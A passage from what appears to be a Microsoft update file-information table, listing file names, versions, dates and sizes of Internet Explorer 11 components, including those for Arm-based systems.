9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported Arm-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 20:58| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 18:58| 1,035,264 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 21:28| 320,000 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:05| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:47| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 18:59| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 